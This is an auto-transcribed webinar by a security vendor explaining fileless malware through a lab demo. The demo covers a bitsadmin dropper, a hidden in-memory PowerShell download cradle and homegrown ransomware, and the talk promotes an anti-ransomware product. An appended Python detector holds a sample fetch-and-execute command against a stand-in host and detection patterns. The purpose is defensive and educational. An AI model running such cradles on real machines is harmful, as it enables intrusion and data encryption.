Fileless Malware Demystified

Hi, I'm Greg Edwards with WatchPoint, and I have Nathan Studebaker with me today. What we're going to talk about is the rise of fileless malware. So fileless malware was first seen in 2014 by Kaspersky Labs, actually within their own network. They named it Duqu 2.0, and it was running on several of their servers and was exfiltrating data. This was a 19 megabyte fileless malware running on their server. These were nation-state actors that were perpetrating this attack. So the reason that you guys are looking at this today is because the attackers have moved beyond the nation-state attackers to profit-motive attackers, and that's exactly what we're going to talk about today: how these profit-motive attackers are utilizing fileless malware to attack commercial systems. So Nate, if you would, please go ahead and start us off.

Absolutely, and thank you for the introduction, Greg. So the topics that I'm going to talk about today: first we're going to start with a very basic intro into fileless malware. I think it's important to just define exactly what that is, and once we have that defined, we'll take a closer look at the ins and outs of it, see exactly how it works, the pros and cons, why you would want to use it, and then towards the end of the demo we're going to go through some different scenarios. So we have three different scenarios, and we're actually going to start with a traditional file example. So this one involves a dropper, where something's actually going to be downloaded and executed to our disk; so it's going to land on our disk and execute. I know that that's not a fileless example, but we want to start with that to just help contrast and really set up the differences between a traditional dropper and the fileless examples that we'll finish with. So we have two fileless examples: one's just some generic malware, and the last one is some fileless ransomware.

So what is fileless malware? Let's first define that. Well, quite simply, I think it can be defined as malware that doesn't write anything to the disk. So I think the question that most people have when they first hear of it, and they understand that it doesn't write anything to the disk, is they ask, well, how does it execute? What's the sort of magic that's going on? And really the magic, if you will, is quite simple. In a traditional example you're downloading essentially the malicious payload, the malicious code, to your computer and you're executing it. Well, the fileless example doesn't involve a downloader; it simply leverages a shell that's capable of reading and executing the code all through memory. And anything that a traditional file-on-disk malware can be used for, well, so can fileless, or rather, anything that traditional malware can be used for, so can fileless malware, whether it be ransomware, which we'll show today in the demo, backdoors like a reverse shell, exfilling data, harvesting credentials; you know, the sky's the limit there.

So as Greg said, fileless malware is definitely on the rise. Now, these stats were taken from a cybersecurity company called Carbon Black, and I've included the source to the blog article, which you can find at the bottom; it's actually on a Dark Reading blog article. But the point is, last year there was a huge increase in the amount of fileless malware that was being used. Last quarter of 2016 there was a 33% increase. It was also used by a leading ransomware campaign known as PowerWare, so PowerWare is a fileless ransomware campaign that uses PowerShell. Also in the news, it was allegedly used in the DNC hack, and as Greg already said, it's being found on servers and workstations. So it's not just something that you have to worry about from a workstation perspective, as far as attackers parachuting over your defenses, landing on your endpoints through malicious sites; the attackers are using the same attack vectors to attack servers and workstations. They're just really carrying out the last phases of the attack with PowerShell or other fileless malware because it's so much more stealthy.

So one topic that I like to tell people about and keep in mind when I'm talking about fileless malware is the idea that RAM consumption is a hard drive. So if you consider RAM as the newish hard drive, and if you take an example such as Knoppix or any other live CD, you know that you can load an entire operating system in memory. So the capacity is there for memory to hold a lot of information, and again, the capacity has been there to do a lot of things; even entire operating systems can be run. And fileless malware, if I'm a hacker, one advantage that it has for me is that it's taking a path of least resistance, because there's never a file that gets written to the disk, there's nothing for an antivirus engine to scan, and that's how I'm able to be a lot more stealthy but still carry out devastating attacks.

So let's walk through a traditional malware infection. I have the steps here on the slide, and let's just talk through each one. So in a traditional example that involves downloading the file to the disk, it's going to start, let's say, with the user visiting a web page, right? They download a file, the file is written to their disk, and once it's on the disk, that's where your antivirus has a chance to scan it. And if it's seen this malicious file before, if it has a signature for it, then it quarantines it, right? You're not allowed to run it. But if it hasn't seen it before, which is unfortunately often the case with antivirus, then it considers it safe and it allows you to actually execute the file, and that means that you've now infected yourself: you downloaded it past your AV and now you've infected yourself with some malware.

But if we contrast that with the fileless example, we see that the exploitation actually happens a lot quicker. So let's walk through that. The first step again is going to be my user visiting a page. The next thing that happens is I interact with the website, and that could be something as simple as visiting a web page; maybe it's filling out a form or clicking a button. We're actually going to do both of those in our demo lab. But once you've interacted with the site, that's when really the first necessary component of fileless malware kicks in, and that's spawning a shell. Okay, so once the shell is spawned, now we have the ability to run malicious code, and again, nothing ever touches the disk, there's nothing for antivirus to scan; this is strictly done in memory, right? And they're leveraging shells. If you're on a Windows computer you've got many different attack vectors available to an attacker by default: command prompt, PowerShell, wscript, even JavaScript is supported natively in Windows, and those are all being leveraged to carry out these attacks. And I actually have some PowerShell code that's kind of to the left of that RAM stick, which is legitimate code; it's the same code we're going to use in the demonstration today. It's the same type of formatted code that we've actually seen, I personally have seen, used in the wild, and we'll explain more about those components, the different switches and what it all means.

So something else that's important to keep in mind is that it's not just malware that is using command shells; legitimate programs use them too. On this slide I have two screenshots, one at the top and one at the bottom, and upon initial glance it's not really apparent which one is malicious and which one isn't. I'll just tell you that one was malicious and one wasn't. If you look at them both, they both involve Internet Explorer as our parent process, and then they both have a child process that is a command shell. For our picture on the top, we happen to use wscript as our command shell, whereas in the picture on the bottom we're using cmd.exe. Now, if I was to stop there, I don't think you'd be able to tell me, and I certainly wouldn't be able to tell you, which one was malicious or not. But I happen to also be showing a child process, pwn.exe; it has our parent process of cmd.exe. So that was something that was done in my test lab. Malware developers don't give their files obvious names such as pwn or ransomware.exe and things of that nature. But the point of showing this slide is that legitimate programs do this and function in the same way that our malicious programs do, and that's part of what makes incident response so difficult.

So now let's talk about the pros and cons of fileless malware, and this is from an attacker's perspective. I'm a cyber criminal; what's my motive for using these? Well, one thing that I kind of already touched on was we have common shells. I know that across any Microsoft Windows computer on the planet I'm going to have PowerShell, command prompt, wscript, JavaScript, all already there at my disposal, and that's if they didn't even install anything else. If you're using Linux you have bash, you might have Python and a host of other types of shells. So I have common shells I can leverage to attack a system, right? We talked about the fact that by definition it's fileless, so that makes it very evasive. Because of all those factors it's harder to detect; there's not many signatures being created for this stuff, so I as a hacker can reuse the same commands, the same attacks, over and over. Now, the biggest con to it is that it's not persistent, and what I mean by that is my payload, my malicious code, is being done all in memory, so if that system is rebooted, part of that means that the memory gets cleared and now my malware is gone. So that is a big downside, but I will also say that a lot of perpetrators are really blurring the lines of fileless malware. They're still going to not use a dropper, they're still going to use a command shell and run everything in memory; the only part where they're blurring the lines of fileless is the actual persistence. And instead of writing a file to disk, where it's more certain to be scanned and caught by antivirus, they're actually maintaining persistence in the registry. So they'll store their malicious code in the registry and put it in the startup location, so if the computer is rebooted, the memory may be cleared, but upon boot-up it gets loaded back into memory and it stays there. And they take advantage of the fact that not a lot of companies, not a lot of businesses, are doing full registry scanning and/or alerting.

So now that we've kind of covered what fileless malware is, let's go into the demo environment so I can explain how things are set up, so that once we're running these actual examples in our lab it'll just help make sense of everything. So let's first define a couple of things, and I'm making some generalizations here, but for the most part your typical environments can be put into two categories. You have your less secure environment, and that's where everyone has full admin rights to the computer, there's no application whitelisting or anything that would prevent a user from installing any application they want, and your only security, other than firewalls and spam filters, is antivirus. That's the less secure setup. The more secure setup involves revoking and/or restricting the use of admin rights, so that's where you're going to say okay, only certain people get admin rights; most people get standard user rights, right? Then you back that up with actual application whitelisting, so not only have I removed admin rights, I'm also restricting what applications can be installed, and then I'm further backing that up with antivirus. And we've actually chosen to use the more secure environment for our demo lab. So the computer that I'll show you here in a moment: it's a standard user, I don't have admin rights, I do have application whitelisting set up via Microsoft Software Restriction Policy, and we're backing that all up with AV. And the purpose of that is to just really demonstrate to you that despite these best practices, I can still bypass all that security with fileless malware. Okay, now the software restriction policy, it's a disallowed policy. I usually get a lot of questions on this, so I'll cover it briefly: disallowed means deny by default, so unless you're in C:\Program Files or C:\Windows, or in this case C:\Support, you can't run. So just wanted to get that out of the way as well.

So the live demo we're going to do; this is the last slide before we get into it, or I guess I have one more. But again, we're going to start with a drive-by download. So this is where I'm going to visit a site, I'm going to interact with it, and this is going to be our traditional malware example: we're going to download a file to the disk, and we're going to show it bypassing SRP, essentially as if we didn't have whitelisting, and we're also going to show whitelisting preventing it. So it'll hopefully help set up and give some contrast between a traditional method that involves downloading and running a file to the disk, and the last two scenarios that we run through, which are our fileless malware: the first version being PowerShell malware and then the last one the PowerShell ransomware.

So getting to our lab here, again, I've got a standard user, I don't have admin rights, I'm restricting what software applications can be installed via SRP. And essentially what that means is, when you take away admin rights from a computer, pretty much the only place that a user can write and execute files is the AppData folder, and you supplement that; that's the security hole, so you supplement that with something like a software restriction policy. So my user's restricted to AppData and I'm further restricting what they can even run there. Now the actual attack, the shell that we're going to leverage: again, keep in mind all fileless malware, including this one that uses a dropper, they're leveraging a shell of some sort. So we're going to use cmd.exe; we're then going to call on the Background Intelligent Transfer Service, BITS, and BITS is a service that's installed on any Windows operating system. It's there by default, it's running, and it's going to download and execute our dropper. So I have the actual command, which we'll go over just briefly and go into more once we're in the lab. But essentially, again, our shell's going to be cmd.exe; we're going to call on bitsadmin to start a transfer job which goes out to the web, http://demoserver.com, and it's going to download this pwn.exe. And then if you notice I have the C:\Users\username path; I'm going to have the ampersand star. So what you can do with BITS, you can select to download and execute the file at the same time, and that's actually what we're going to do here in our lab.

So Nate, before you move on here, I just wanted to make the point that this is the non-fileless version of a malware example, and that's where that pwn.exe is the actual file that's getting downloaded and then executed. So this is the non-fileless version, and that's what Nate's going to show first.

Yeah, thanks, Greg. Okay, so here's my screen over here. So here is our Windows 8 computer, and what we're going to do is first just demonstrate that I am a restricted user; I can't just install any old application that I want. So I'm going to go ahead and go out here and download, or try to download, Google Chrome. All right, so download Chrome, I'm going to go ahead and try to run it, and then here's the prompt from our software restriction policy saying your system administrator has blocked this program. And I think the thing to note here again is the AppData folder. So if I'm a programmer with ethical intent, I know that I may want my application to be installed by users who don't have full admin rights, and I also know then that if I'm going to have them install it, I need to run in AppData; that's a location that even non-admins have read and write access to. Software restriction policy allows you to secure that location and say nope, I'm actually going to control what can or cannot be run. So this is expected behavior; it's really just to demonstrate that we have SRP and I'm a restricted user.

So the website for today, what we're going to use kind of for the attack, is this website right here. This is our Jimmy Pesto's pizza shop website. Now, if you're a fan of Bob's Burgers like myself you'll get the reference, but the point of using this as an attack vector is to demonstrate really just one of the ways that these types of attacks can be carried out. This website, you know, it looks like a real website, it feels like a real website; for all intents and purposes it is. I can look at the menu, I can browse it. So let's go ahead and do our first demonstration. So this one's going to be where I'm essentially going to download and execute a file to our support folder. Our support folder is not restricted by SRP, and I wouldn't expect a hacker to guess that and just be able to code their program to do that right away. This first demonstration is merely to say, let's say I didn't have a software restriction policy on my machine, how easy is it then for malware like this to run? So let's go ahead and demonstrate that. I'm going to go down to a form. So like I talked about before, the first step is the user, in this example, I visited a page; now I need to interact with it. So I filled out some information on this form and I'm going to go ahead and send the message, let them know I've got a party of 12 people and that we want some pizza. So as soon as I do that, we get this command shell here. Now, I kind of chose BITS because it opens up like this; it provides a nice glimpse into the shell that is running. And now I've got this other pop-up on my machine about my computer being locked. This was actually a screenshot from the Windows XP virus, an old virus that used to say you pay us $29.99 to remove this virus. So this is a common technique that malware uses to extract further information and get money from the victim, from the target. Got this pop-up here as well.

But now that that happened pretty quickly, let's walk through it a little bit slower, maybe. So I'm going to view the source of the web page and kind of pull back the curtains a little bit more about what actually happened. So this script right here, this line of code, is tied to that submit button. So once that submit button is executed, my browser is essentially telling the computer to open cmd, start a BITS transfer job and go to this URL, right where our malicious file is, and then finish it off with a download and execute. So within just a few lines of code we can turn a form into a malicious dropper that not only downloads but also executes the file. So that's just an important distinction to make.

We have a question that came in that says, can't we just exclude cmd.exe from running? I'll let you answer that.

Sure, so yeah, that's actually something I will cover more kind of towards the end of the demonstration, but you can disable shells such as cmd.exe. The problem with that is that, as you'll see in my next example, I can just use a different shell or a different attack vector. So you can do that, but I think, as you'll see in our next demo and as we talk about further along, it shouldn't be the end-all, be-all solution.

Right, and the other thing is that this first example is very simple, kind of the methods that have really been used for the last 10 years, and Nate is showing a compare and contrast against the old way and the new way. So go ahead.

No problem. Yeah, so we submitted the form, I showed you the code, so let's do the same thing, but this time to AppData. So I do not expect this one to run; this should be blocked by the software restriction policy. So I'm going to go ahead and just click this button because I want to see the menu. Here's our BITS command prompt again, here it is transferring a file, okay, and it closes. We'll give it a second, minimize that, right? But there's nothing else happening, right? There's no other activity, and again, that's because in this case our software restriction policy did what it was supposed to do and didn't allow just any application to run.

So what it did still allow is that file to be transferred over, and that's important, but then as Nate's showing right here, that executable file that was transferred over, what happens when you run it?

Exactly. So yeah, if we try to run the file we get that same prompt like we had before, saying sorry, this directory is restricted, contact your administrator. So we expected all that to happen, but just wanted to provide that first glimpse of, you know, file on the disk versus fileless. So let's go ahead, and I think I have another slide to show you, and then we'll move into the fileless example.

So our fileless example, again, same computer, so we're a standard user, we are using software restriction policy, and this time our shell of choice is going to be PowerShell. Now PowerShell is used by a lot of attackers because it's a very powerful scripting engine, and it certainly blurs the lines of other scripting engines. It's got built-in cmdlets so you can automate a lot of tasks; you can actually run .NET and C# code right within PowerShell, so it's more than just a scripting language. So if we look at this command, I just want to talk through the different components, because this is going to provide another important distinction between the traditional dropper, file on disk, versus the fileless.

So okay, again, first it starts with our shell, so our shell, powershell.exe. We have two switches here, NoProfile and ExecutionPolicy Bypass. So two security measures that are often implemented to restrict the use of PowerShell are by assigning a profile, so only certain users can run it, and by using execution policy, so only maybe signed scripts can be run. So those are good switches to have to help lock it down, but as I show you, they can be turned off with two switches, so it's more security through obscurity than anything else. The next switch is WindowStyle Hidden. So we're going to see the initial PowerShell command prompt open; a typical malware developer's going to hide all of that, but this WindowStyle Hidden is at least going to hide the running tasks. So once PowerShell opens, then it's going to go to the background, and the next thing it does is an Invoke-WebRequest. So Invoke-WebRequest is a built-in PowerShell cmdlet that you can use to browse a web page; you can browse the web page through the command line. You could have used anything else here, .NET functions, a lot of things, but I kept it simple. But the point is this Invoke-WebRequest is going to browse our page through the command line, so the page is our demo server; this is where the malicious content is hosted. And the thing to keep in mind is, in our last example it was pwn.exe; well, this one's just pwn.html. Again, we're not using a dropper; we're simply telling PowerShell to go to this web page. Okay, then we're going to filter the web page; we want just the content. I don't want the header, I don't want the HTTP return status, I just want the actual content of the page. Store that as a variable, and then turn around and execute the contents of that page. So whether the page is malicious code or just somebody's food blog, PowerShell is going to treat it the same, and it's going to turn right around and execute it.

So I think it may help to first start off and let's look at the page in question. So for this one I'm going to use a different page; this is our social media page that we're going to use here. It looks and feels like a typical page, right? You can see my groups, my interests, my events, you can see my photos, things like that. Like I said, no reason not to trust this at all. I can even post to my wall here, which I'll do real quick. All right, perfect. Now again, the user has to interact with the site somehow, all right, and we're going to do that today via this friend request.

But before we do that, okay, that doesn't necessarily have to be filling out a form and clicking a button, like you're showing here; we're going to click that accept button. It could be any number of things; it can be simply just visiting the page.

Yeah, thank you for that distinction, yes. Ours involves clicking something, but that type of drive-by attack, where you simply just went to the URL, is actually probably more common for the malware developers. But the interesting thing here, let's look at our source again. So before I run this, let's take a quick glimpse at what's actually going to run. So again, I'm going to use PowerShell to Invoke-WebRequest to my site, and then I'm going to turn around, filter the contents of this site and throw it right into an execute statement. So we can actually go visit that page that is hosting our malicious code beforehand. So let's do that. So this is all our shell code. So all that I really need to have happen, again, is the user to interact with my web page, and I'm already serving up malicious code via this page. So once I click on this accept button to accept this friend request, PowerShell is going to go out to this page and then execute all the code. So let's go ahead and do that. And actually, before I do that, I do want to get one thing running; I want to open Process Explorer. This is going to give us good insight into what's happening in this aspect.

And again, Nate doesn't have admin rights to this machine, so that's why he's having to type in "run as administrator" and then type in the admin username and password to be able to actually run that.

Okay, so let's go ahead and we're going to accept this friend request. There's the PowerShell, there's the shell, all right. And if we look at Process Explorer, so here's our malicious pop-up here letting me know that we've been pwned. And I think what's interesting here is that we have our Internet Explorer process and then we have a child process of PowerShell. So this is really highlighting the fact that PowerShell was spawned from our Internet Explorer and is being used to carry out the attack. There's no dropper involved; it's simply just doing all this in memory, which is what we're seeing here. This is essentially like looking in Task Manager, and if I highlight our shell we can actually see the command line, again, that PowerShell actually invoked. So aside from seeing the process tree, I can actually see the commands there as well. So I'll go ahead and close that. You notice that PowerShell went away because I closed it. So that's a very crude example of fileless malware, but in our fileless ransomware example, which I'm going to show you next, there's not going to be anything for us to close; it's going to be what I call the silent killer.

So before I do that, I want to just do something to show everyone that this is indeed ransomware, that it will indeed encrypt files. Connected to my computer I have a Z drive, and on that Z drive I have some data out here. I'll start with a new file. So I have some directories out here, I have some actual data; so this is all just going to be used by the ransomware. The ransomware is going to go out to this drive, it's going to start encrypting the data. So I'll go ahead and create a file here and kind of show you the before and after, so I'll call it "a file" and put in "my unencrypted text", okay? So this will be a nice before and after, because once we run the ransomware, again, it's going to be the silent killer; it's going to run in the background, and we'll come back and look at this file and see if it's actually encrypted or not.

And maybe before you actually start that, we should show that code. Oh yep, thanks. Yes, absolutely. So this code is a little more involved. This is actually all homegrown malware that Nate has created, and I'll let you explain, Nate, what we're looking at here.

Sure. So once again, I know that I'm going to be able to spawn a shell, and all I need to do is serve up the malicious code somewhere, and this is the PowerShell ransomware that Greg said that I developed in-house. So this is actual ransomware. We actually created this as a free tool that we give away on our website; it's called the PowerShell Encrypter/Decrypter, and what it allows you to do is test your own defenses. That's the purpose behind creating it: you can run actual ransomware that's going to encrypt files, but with the added benefit of being able to decrypt the files afterwards. So again, we built it as a way to test your defenses. There's really no better way to know if your defenses can stop ransomware than to have actual ransomware. So this is pretty much the same thing, but without all of the fallout of not being able to get your data back.

And you can see right on line, what is it, the fifth line there, which types of files it's going to go out and encrypt. So, you know, go attack these specific kinds of files. Most ransomware actually will attack about 25 to 30 different types of files, so I just wanted to point that out, that it's going to go attack those specific kinds of files.

Yeah, exactly. And this one was coded with some specific behavior it mimics: it actually also attacks the network drive first, and the reason behind that is that that's more the way that ransomware is going. They figured out that they can inflict the most damage by attacking a file server and coming back to the workstation last. But anyways, this uses 256-bit AES encryption, so it's a very secure encryption algorithm, and when it's all said and done I think it's just under like 200 lines of code. So it's not a whole lot that you actually have to do to create ransomware. And again, once I run this, so the way we're serving this up is through the decline button. So what's going to happen is, once I decline the request, we're going to have our PowerShell process spawn, and it's going to go out to this page and then download and execute the contents of the page. And again, just to recap, we have our file here that's unencrypted, so we'll come back and take a look at that in just a moment, just to show you that it is indeed encrypting data. So without further ado, go ahead and click on that. There's PowerShell, right? And, you know, no pop-ups, no warning sign that anything's happening; PowerShell is running as a child process like it should. And if I come back to that file, I'm sure it's already encrypted, and there it is: this is the encrypted text, no longer what we had before. Something else that we actually programmed ours to do is to not change file extensions, because that's a dead giveaway to what's happening, and a lot of malware has at least stopped changing file extensions, so they use random file extensions. But that's beside the point. The point is that this is running, it's encrypting the files on our network, and again, this is the silent killer. This doesn't need to survive a reboot. Ransomware can encrypt files now in the neighborhood of 200 gigs an hour, so they don't need a lot of time; they just need a regular business day, and they can place you in a very compromising situation.

And I think the big thing there is that that didn't seem like much; not a lot happened, and an actual attacker would even hide that; you wouldn't even see that little pop-up blip. I mean, it was barely noticeable. But the big thing is it's encrypting files out on the network right now, and if this were one of your users that had accidentally clicked on this page, then it's running on your network, and like Nate showed, it's known to look to the network drives first. So it's encrypting files out on the network right now and no one would know it.

Yeah, exactly. So that's the big danger here with it.

Yes. So Greg, did you want to talk about CryptoStopper briefly?

Yeah, so if you want to stop that process from running, just so you're not encrypting everything out there already, then next we'll basically do the same example but show it with our product called CryptoStopper, that will stop the ransomware that is in action. So like we were talking about, that kind of ransomware, like this, really any ransomware, once it's running, then how do you know that? I mean, you typically don't know that until someone comes and says hey, I can't access this file, and then you realize, whether that's 30 minutes or three days later, that terabytes and terabytes of data could be encrypted. So go ahead and start up the CryptoStopper service on that server and let's show what happens when CryptoStopper is running.

Okay, yeah. So CryptoStopper, like I said, this is our anti-ransomware product that we developed. It's a deception-based solution; it doesn't use signatures or anything like that, and it's used to stop actively running ransomware, and it does it very quickly. It's really easy to set up. I won't go into a lot of detail with it, but really all you do is select your share, select all the folders you want to protect, and Crypto
stopper crypto software does the rest so let me just check one thing to make sure we're we're locked and loaded and for good services crypto Stoppard running yeah so if I come back to my computer now again I've got I've got my Z Drive this is where the remnants mover is gonna get a target first let's go ahead and run it again good check process Explorer see yep there it is again there's PowerShell running showed you already that it that it's encrypting data so what crypto Stoppers gonna do is it's gonna actually detect detect the ransomware and and know that it's coming from this computer and and here's actually the message from crypto stopper so this is a message that our software sends out to the infected host to patient zero if you will saying hey you know we've seen ransomware okteivia on this computer please sign out because we're gonna automatically shut down this computer here in a few minutes and if I go back to my Z Drive so I can see that PowerShell is still running and that's okay because I actually don't have access to my C Drive anymore so what crypto stopper is done it's actually identified this computer amongst all the other ones in the network and it's isolated it from the front from the server so here's the IP address our infected computer Oh Stoppers using this firewall rule to block that computer so that way everyone else can continue working but the infected host is isolated and is and is prevented from doing any any other further harm like I said cannot get access to that drive so just want to just wanted to show that so I have a couple more slides that I'd like to like to finish off with just to kind of recap everything that we've talked about so far so hopefully by now we know that file is malware well it really starts in RAM there's no dropper involved it's simply just using a shell to read and execute so something interesting here even though I demonstrated how the code can be hosted on webpages some attactive is are starting to now use DNS 
DNS records and they're doing that as a another stealthy way just another thing for you to have to worry about as far as your defenses go if you've ever set up like an SPF record it's a it's actually a DNS tht record and essentially they're taking the code similar to what I have in bold at the bottom of the slide putting it on the DNS record and then they're calling it with their show so again starts in RAM it leverages a show to read and execute the contents all in memory and then once that's happened that's when the malware infection begins alright so so the question that that everyone should be asking themselves is how do we defend against this I and we were showing just one kind of attack vector we're showing what what we're seeing attackers transition to you and that's infecting websites so there are 76 and a half million WordPress sites right now that's about 25% of all the websites in the world are hosted by WordPress which is not and I want to pick on WordPress I think it's a great platform but it's very vulnerable to these attackers taking over those sites and doing exactly what Nate here and hosting that malicious code on them so when you think about your users interacting with websites on a daily basis how do you stop that and we break that down into reactive systems and active systems Nate if you want to proceed ahead we're not gonna go into great detail on these but a reactive system is an incident of compromised tool so end point detection one of the slides that Nate showed is actually a system we use called carbon black and it allows you to read endpoint recording essentially and then compares that against incidents of compromise and the reason we call that reactive is because it has to happen in it it you take action after the fact so and then a sim sim tool would be another example of a reactive tool active tools would be DNS sinkholes of black holes and crypto stopper like we showed so crypto stopper on average will stop a host post infection so 
ransomware actively running on the network I will stop it in on average 17 seconds so so with that I know we've got a few questions that are posed out there so let's let's pull those up and and talk about those first is doesn't AV scan memory so so yes it does but it only scans memory on boot-up and then on a scheduled basis so and again attackers are going to they're gonna test these systems out before they ever release any code so they're they're going to make sure that it does execute in the next next question is similar vein would an anti exploit program stop this so the answers maybe but probably not and again the attackers are going to they're going to test it before they release it so they're going to know already that they're going to be able to bypass your your prevention measures and then we just have one one final question can you show the code running remotely again I did exactly catch that so if you would not back up and showed that actual code to that station sugar yeah you mean one side yeah so crypto stopper a good thing about it is a it will it will shut down the PC for you you know in addition to isolate you're pulling that up that brings up a good question of okay what happens if the user reboots in a viola example as long as they didn't create any persistence then it's flushed it out of memory so it's not going to run in a traditional file based attack that ransomware could run again and it with crypto stopper installed it's still going to be blocked unless the admin goes and allows that user back on the network because what it's doing is creating a firewall rule and I don't know if you already asked Peter sick of been on here yeah so what I think it was it was getting soaking so hung up because it was trying to map that drive again and I can't yeah so what this is demonstrating like Gregg said is that when you reboot the system even even if you reboot the computer it comes back online before you've had a chance to move that remove the threat 
crypto stoppers still blocking that I can't I can't access that that drive anymore but once you do get it cleaned up once you do have the system virus free crypto stopped or all you need to do to get that allow that computer to talk to the to the server again is to remove the IP address from the rule so within a couple clicks now I can go back to my workstation and I've got my drive again but yeah I guess to to follow up with that question let's go ahead and look at go back to our social media page and we'll look at that code one more time yes so this is yes it's the example of the file less so this is where it's executing PowerShell and I don't want to steal your thunder here Nate but executing PowerShell and not downloading a file but just exit code executing it so go ahead and name yeah exactly so you know more so it kind of treats the yes it's treating the webpage it doesn't care what the web page has hosted it's just treating whatever is on it as as code and and when when the web page is hosting malicious code it obviously then can be used used against you and that you know I know when I was first getting into this it was it was almost a letdown there's almost a plate and I thought that's all it is but I mean that's all it it you know it's that simple that that all I need is is a show something like power show and then from there I can invoke a web request to my web server right filter the contents of the page I'm just really getting the code and then turn around turn right around and invoke it as a script so PowerShell is a very powerful language but it's you know but it also can as I've shown here can be weaponized and I guess one other interesting point that I haven't talked about yet is the hard coding of this Pat so this is something that an attacker would do they know that C windows system32 windows powershell version one probably WC that is the path to the windows powershell on every single windows computer out there so they can hard code that that's a 
very easy thing to do and no and and yeah there's kind of kind of leveraging that too like I said read the contents of a page which happens to be listed here and why don't you show that again to and we'll finish up with Nate yeah so the ransomware again you know that's kind of what the page looks like you know it's something a user would you know not visit but that's that's not the point garbage okay so right all right well thank you everyone for joining us today we'll wrap up with that with a little bit of 220 lines of scary code so thank you everyone for joining us have a great day
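As an added defensive example (not code from the webinar or from WatchPoint), the following Python scores constructed Sysmon-style process-creation events for the traits the speakers describe: a browser-spawned shell that fetches page content and runs it in memory with no script on disk, plus the DNS TXT variant. The event records, hostnames, indicator weights and thresholds are all assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed, Sysmon-style process-creation records (not real telemetry).
# Event 1 mirrors the cradle described in the webinar: a browser spawns
# PowerShell, which reads a web page and runs its content in memory.
# Event 3 mirrors the DNS TXT variant also mentioned in the talk.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://social.example.invalid/page).Content"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -c "Resolve-DnsName -Type TXT cfg.example.invalid"'},
]

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}

# (name, weight, regex) matched against the command line, case-insensitively.
# The full path to powershell.exe is deliberately not an indicator: as the talk
# notes, it is identical on every Windows host, so it separates nothing.
INDICATORS = [
    ("download-cradle", 3, r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|net\.webclient)\b"),
    ("in-memory-exec", 3, r"\b(invoke-expression|iex)\b"),
    ("dns-txt-lookup", 2, r"resolve-dnsname.*-type\s+txt|nslookup.*-(type|q)=txt"),
    ("hidden-window", 1, r"-w(indowstyle)?\s+hidden"),
    ("encoded-command", 2, r"-e(nc(odedcommand)?)?\s"),
    ("no-profile", 1, r"-no(p|profile)\b"),
]

@dataclass
class Finding:
    score: int = 0
    indicators: list = field(default_factory=list)

    def verdict(self):
        return "high" if self.score >= 6 else "medium" if self.score >= 3 else "low"

def analyze(event):
    """Score one process-creation event for fileless download-and-execute traits."""
    f, cmd = Finding(), event["CommandLine"]
    for name, weight, pattern in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            f.indicators.append(name)
            f.score += weight
    if event["ParentImage"].rsplit("\\", 1)[-1].lower() in BROWSERS:
        f.indicators.append("browser-parent")  # browsers should not launch shells
        f.score += 2
    # Fetch plus in-memory execution with no script file is the fileless pattern itself.
    if {"download-cradle", "in-memory-exec"} <= set(f.indicators) and not re.search(r"-file\b", cmd, re.I):
        f.indicators.append("fileless-cradle")
        f.score += 3
    return f

def triage(events):
    """Return (verdict, indicators, command line) for events that merit a look."""
    return [(a.verdict(), a.indicators, e["CommandLine"])
            for e in events for a in [analyze(e)] if a.score >= 3]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(*row, sep=" | ")
```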
Info
Channel: CryptoStopper
Views: 9,867
Rating: 4.9333334 out of 5
Keywords: malware, ransomware, fileless malware, fileless ransomware, WatchPoint, CryptoStopper
Id: atL1WmmMJJw
Length: 48min 41sec (2921 seconds)
Published: Thu Apr 06 2017